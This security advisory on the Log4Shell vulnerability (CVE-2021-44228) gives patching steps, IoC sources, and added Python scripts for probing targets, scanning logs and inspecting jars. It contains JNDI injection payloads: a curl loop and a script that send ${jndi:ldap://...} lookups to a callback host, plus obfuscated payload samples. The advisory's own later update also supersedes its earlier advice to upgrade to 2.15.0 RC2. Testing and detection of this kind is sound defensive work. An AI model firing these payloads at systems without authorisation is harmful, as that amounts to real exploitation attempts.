Update as of Wednesday, December 15
It has been discovered that the Log4j 2.15.0 RC2 patch does not fully remediate the Log4j vulnerability. We now recommend upgrading to version 2.16.0.
https://github.com/apache/logging-log4j2/releases/tag/rel%2F2.16.0
Update as of Tuesday, December 14
As promised, we are continuing to update this page as we find new information and as more is made public about CVE-2021-44228. Below are recent observations, information about IoCs, and steps you can take to check for vulnerabilities.
How to Quickly Check Your Perimeter for Vulnerability
- Go to https://log4shell.huntress.com to receive your custom payload for testing.
- Save this payload to a text document for reference later.
- Click the link to “View Connections”
- Create a list of all URLs in your environment you wish to scan and save them, one per line, into a text file named "URLTarget.txt", e.g.:
- On any Linux system, execute the following bash command (the header value is single-quoted so the shell does not try to expand ${jndi:...} itself):
for line in $(cat URLTarget.txt); do echo "$line" >> output; curl -k "$line" -H 'X-API-Version: ${jndi:ldap://log4shell.huntress.com:1389/YOURCUSTOMPAYLOADHERE}' --output - >> output; done
- Monitor the Huntress tool for any connections. Any connection logged confirms a vulnerable server.
- All curl activity is logged in the "output" file.
- If any of your external applications have input fields, use the custom payload (full string starting with $) and enter that payload into any input fields that are available. Again, any connections logged on the Huntress “View Connections” page confirm a vulnerable server.
***A negative test does not guarantee that your application is not vulnerable.***
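The curl loop above sends the payload in a single header, but Log4Shell fires wherever attacker-controlled input reaches a log statement. As an added example that is not part of the original post or of the Huntress tool, the following Python script fans the same payload out across several commonly logged headers and one query parameter, reads URLTarget.txt one URL per line, and appends every probe it sent to the "output" file, mirroring the curl loop. The header list, the parameter name q and the file layout are assumptions made for this example; as with the curl loop, only a connection showing up on the Huntress "View Connections" page confirms a vulnerable server, and the HTTP status returned says nothing about exploitability.

```python
import ssl
import urllib.error
import urllib.parse
import urllib.request

# Injection points that commonly end up in application logs.
# Constructed list for this example; extend it with whatever your apps log.
PROBE_HEADERS = ["User-Agent", "X-API-Version", "X-Forwarded-For", "Referer", "Authorization"]
PROBE_PARAM = "q"   # hypothetical query parameter name, assumed for the example


def build_probes(url, payload):
    """One (url, headers) pair per injection point for a single target URL."""
    probes = [(url, {h: payload}) for h in PROBE_HEADERS]
    parts = urllib.parse.urlsplit(url)
    query = urllib.parse.parse_qsl(parts.query, keep_blank_values=True) + [(PROBE_PARAM, payload)]
    probes.append((urllib.parse.urlunsplit(parts._replace(query=urllib.parse.urlencode(query))), {}))
    return probes


def send(url, headers, timeout=10):
    """Send one probe, ignoring TLS errors like curl -k; returns the HTTP status or None."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code            # a 4xx/5xx still delivered the payload to the application
    except (urllib.error.URLError, OSError):
        return None                # unreachable: the test was not performed, note it


def probe_targets(target_file, payload, log_file="output"):
    """Read URLs (one per line, '#' comments allowed) and log every probe sent."""
    sent = []
    with open(target_file) as f, open(log_file, "a") as log:
        for line in f:
            url = line.strip()
            if not url or url.startswith("#"):
                continue
            for probe_url, headers in build_probes(url, payload):
                status = send(probe_url, headers)
                where = next(iter(headers), f"query param {PROBE_PARAM}")
                log.write(f"{probe_url}\t{where}\t{status}\n")
                sent.append((probe_url, where, status))
    return sent


if __name__ == "__main__":
    import sys
    # usage: python probe.py URLTarget.txt '${jndi:ldap://log4shell.huntress.com:1389/YOURCUSTOMPAYLOADHERE}'
    for entry in probe_targets(sys.argv[1], sys.argv[2]):
        print(*entry, sep="\t")
```

Run it with the full payload string from the Huntress page as the second argument, then check "View Connections" as before; the "output" file tells you which URL and injection point was sent when a callback arrives.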
What Are We Observing at This Point?
Simply put—massive scanning and exploitation.
At this time, it appears that attackers are utilizing the vulnerability to drop coin miners, command and control beacons, reverse shells, and (in some cases) deploy ransomware.
Where Can I Find IoCs?
IoCs are moving targets!
Trying to block all “malicious” IPs is not enough. Your focus should be targeted on identifying vulnerable servers—ensuring those servers are remediated—and FULLY investigating the systems for signs of compromise.
As we mentioned before, if you identify a compromised system, we recommend restoring from a backup pre-dating December 9, 2021, while retaining a copy of the compromised server for forensic investigation.
Your network infrastructure should be closely analyzed for signs of lateral movement and further persistence.
Start by reviewing all of your application logs for requests containing "jndi". Investigate every hit and determine whether the exploit succeeded, for example whether the server made an outbound LDAP, RMI or DNS connection to the host named in the lookup. Attackers are now obfuscating the lookup string to evade simple string matching, using nested lookups such as ${${lower:j}ndi:...} and URL-encoded payloads, so the absence of "jndi" hits in your logs does not prove that exploitation has not occurred.
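As an added example (not code from the original post), the following Python scanner shows why a plain grep for "jndi" misses obfuscated payloads: it URL-decodes each log line, collapses the nested ${lower:...}, ${upper:...} and ${...:-default} lookups attackers wrap around the string, and then reports the scheme and host the lookup would reach out to, which is what you need to check your outbound connection logs against. The sample log lines are constructed for this example (documentation IP ranges, access-log layout) and are not traffic from any real incident.

```python
import re
import urllib.parse

# Constructed sample log lines (access-log style; not traffic from the original page).
SAMPLE_LOG = [
    '203.0.113.10 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.11 - - "GET /login HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.5:1389/a}"',
    '203.0.113.12 - - "GET /api HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.5:1099/x}"',
    '203.0.113.13 - - "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.5%3A1389%2Fa%7D HTTP/1.1" 404 "-" "-"',
    '203.0.113.14 - - "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.15 - - "GET /health HTTP/1.1" 200 "-" "${${env:NaN:-j}ndi:dns://198.51.100.5/x}"',
]

INNER = re.compile(r"\$\{([^{}]*)\}")                 # a lookup with nothing nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _collapse(m):
    """Evaluate one innermost lookup the way Log4j's substitutor would, for the
    lookups attackers use as obfuscation. Anything else is left untouched."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)                    # keep the payload itself for the final match
    if ":-" in body:                         # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    return m.group(0)


def normalize(line, max_rounds=20):
    """URL-decode and collapse nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = INNER.sub(_collapse, urllib.parse.unquote(line))
        if new == line:
            return new
        line = new
    return line


def scan(lines):
    """Return (line_no, scheme, host[:port]) for every line carrying a JNDI lookup,
    obfuscated or not. Line numbers start at 1."""
    findings = []
    for n, raw in enumerate(lines, 1):
        text = normalize(raw)
        m = TARGET.search(text)
        if m:
            findings.append((n, m.group(1).lower(), m.group(2)))
        elif JNDI.search(text):
            findings.append((n, "unknown", "unknown"))
    return findings


if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme} to {target}")
```

A hit here is a probe, not a confirmed compromise: pivot to firewall, proxy or DNS logs and look for the server itself connecting to the reported host and port around the timestamp of the request. Grepping only for the literal "jndi" would have missed three of the five probes in the sample.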
Comprehensive IoC List
The following is a comprehensive IoC list that has been created by “Curated Intel”:
Please note: these feeds are considered LOW-TO-MEDIUM confidence. I would NOT add these to your blocklist, but rather to a watchlist. If an indicator is confirmed malicious, then apply the appropriate block.
https://github.com/curated-intel/Log4Shell-IOCs
Here is a list of vendor responses tracked so far (credit to SwitHak for their curation of this):
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Royce Williams has also published a very comprehensive analysis of “The Story So Far.” I recommend everyone give this a read:
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
Further Assistance
Again, if you identify any indicators of compromise and need further assistance, please reach out at .
We will continue to release updates as the situation progresses and we learn more.
On December 9, a critical vulnerability in Log4j was made public. The vulnerability, CVE-2021-44228, affects the Log4j Java logging library and is being exploited widely. Our team at FRSecure is continuing to investigate this active exploitation. Below, we provide known details and suggested steps for protection; the situation continues to evolve and we will update as we learn more.
Affected Entities
Log4j is embedded in a significant amount of software.
Below is the list of known affected applications and vendors. As this is still evolving, the list will likely expand.
- Apple
- Tencent
- Steam
- Baidu
- DIDI
- JD
- NetEase
- CloudFlare
- Amazon
- Tesla
- Apache Solr
- Apache Druid
- Apache Struts2
- IBM Qradar SIEM
- PaloAlto Panorama
- ElasticSearch
- ghidra
- ghidra server
- Minecraft
- PulseSecure
- UniFi
- VMWare
- Blender
- Webex
- VMWare vCenter
CVE-2021-44228 Observations and Suggestions
An extremely high volume of malicious traffic has been observed actively exploiting vulnerable systems since at least Friday, December 10, 2021.
Apply the Patch
If you are using the Log4j library, you should immediately upgrade to log4j-2.15.0.rc2. ALL previous versions of log4j should be considered affected. You can find the download for this upgrade at https://logging.apache.org/log4j/2.x/download.html.
If you cannot apply the patch, remove the JndiLookup class from every copy of the log4j-core 2.x jar on the system and restart the application afterwards (the class stays loaded in a running JVM). The glob below only matches jars in the current directory; copies bundled inside war, ear or fat jar files must be located and handled separately:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
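Before and after running the zip command it is worth confirming which log4j-core copies are actually on disk and whether JndiLookup is still inside them, including jars nested in war and ear files that the glob above will not touch. The following Python script is an added example, not FRSecure's or Apache's tooling: it reads each archive with the standard zipfile module, reports the version from log4j-core's Maven pom.properties when present, and recurses into nested archives. The build_fake_* helpers construct minimal stand-in archives for a local dry run; they are not real Log4j artifacts.

```python
import io
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")


def _version(zf):
    """Read log4j-core's version from its Maven pom.properties, if present."""
    try:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    except KeyError:
        pass
    return "unknown"


def inspect_archive(data, name):
    """Return [(archive path, version, jndi_present)] for this archive and every
    archive nested inside it. Non-zip data is skipped."""
    results = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return results
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_CLASS in names:
            results.append((name, _version(zf), JNDI_CLASS in names))
        for inner in sorted(names):
            if inner.lower().endswith(NESTED):
                results.extend(inspect_archive(zf.read(inner), f"{name}!/{inner}"))
    return results


def scan_tree(root):
    """Walk a directory and inspect every jar/war/ear/zip found."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in NESTED:
            findings.extend(inspect_archive(path.read_bytes(), str(path)))
    return findings


def build_fake_jar(version, with_jndi):
    """Constructed fixture: a minimal log4j-core-like jar (not a real Log4j artifact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buf.getvalue()


def build_fake_war(inner_jar):
    """Constructed fixture: a war with the jar under WEB-INF/lib, as app servers deploy it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", inner_jar)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for path, ver, jndi in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: log4j-core {ver}, JndiLookup {'PRESENT' if jndi else 'removed'}")
```

Any line reporting a version below the fixed release with JndiLookup PRESENT is a jar that still needs the upgrade or the class removal; a nested path (app.war!/WEB-INF/lib/...) is one the zip glob would have missed.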
Utilize the Huntress Identification Tool
Our friends over at Huntress have released a tool to help you identify if you are currently vulnerable.
We recommend using this to test all externally available systems in your environment.
*Disclaimer – a negative test does not guarantee your application is not affected.
You can access the tool here:
https://log4shell.huntress.com/
If You Find Vulnerabilities within Your Systems
If any vulnerable systems are identified in your environment, we recommend fully investigating for indicators of compromise.
If IoCs are identified, we recommend restoring the system from a backup pre-dating December 9, 2021.
We also recommend retaining a copy of the compromised system for forensic investigation.
If you identify a compromised system in your environment, you should also investigate and monitor other systems within your enterprise for signs of lateral movement and persistence.
Final Thoughts
This is an active exploit that is widespread among popular applications and software. Please do your due diligence in identifying vulnerable and/or compromised systems within your environment. And if you identify any indicators of compromise and need further assistance, please reach out at .
We will continue to release updates as the situation progresses and we learn more.